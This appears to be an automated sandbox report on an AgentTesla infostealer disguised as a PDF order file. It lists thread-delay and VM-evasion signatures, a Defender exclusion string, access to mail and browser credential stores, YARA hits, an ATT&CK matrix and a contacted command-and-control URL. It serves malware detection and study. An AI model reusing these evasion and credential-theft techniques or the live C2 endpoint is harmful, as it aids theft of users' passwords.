                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239546Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239438Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239297Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239187Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239047Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238907Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238781Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238672Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238547Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238437Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238328Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238219Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237797Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237500Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237391Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237250Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237141Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 236954Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 236594Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 236094Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 235204Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 235078Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 234953Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWindow / User API: threadDelayed 1168Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWindow / User API: threadDelayed 2873Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWindow / User API: threadDelayed 890Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWindow / User API: threadDelayed 8962Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 240000Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239872Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239761Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 35197Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239656Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239546Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239438Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239297Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239187Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239047Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238907Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238781Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238672Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238547Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238437Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238328Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238219Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237797Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237500Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237391Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237250Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237141Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 236954Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 236594Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 236094Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 235204Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 235078Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 234953Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E128A8 LdrInitializeThunk,5_2_00E128A8
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeJump to behavior
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.657499770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.658122914.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.656873284.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.916801544.0000000002E62000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 7084, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 4296, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: Yara matchFile source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 4296, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.657499770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.658122914.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.656873284.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.916801544.0000000002E62000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 7084, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 4296, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection12Masquerading1OS Credential Dumping1Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery211Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System1Automated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSVirtualization/Sandbox Evasion131Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      mgbless.in5%VirustotalBrowse
                      www.mgbless.in8%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.mgbless.in8%VirustotalBrowse
                      http://www.mgbless.in0%Avira URL Cloudsafe
                      https://www.mgbless.in4Xl0%Avira URL Cloudsafe
                      https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php9%VirustotalBrowse
                      https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php0%Avira URL Cloudsafe
                      https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php127.0.0.1POST0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.mgbless.in4XlLm0%Avira URL Cloudsafe
                      https://www.mgbless.in0%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://www.mgbless.inD8Xl470%Avira URL Cloudsafe
                      http://mgbless.in0%Avira URL Cloudsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://OcJtmX.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mgbless.in
                      104.223.93.105
                      truetrueunknown
                      www.mgbless.in
                      unknown
                      unknowntrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.phptrue
                      • 9%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
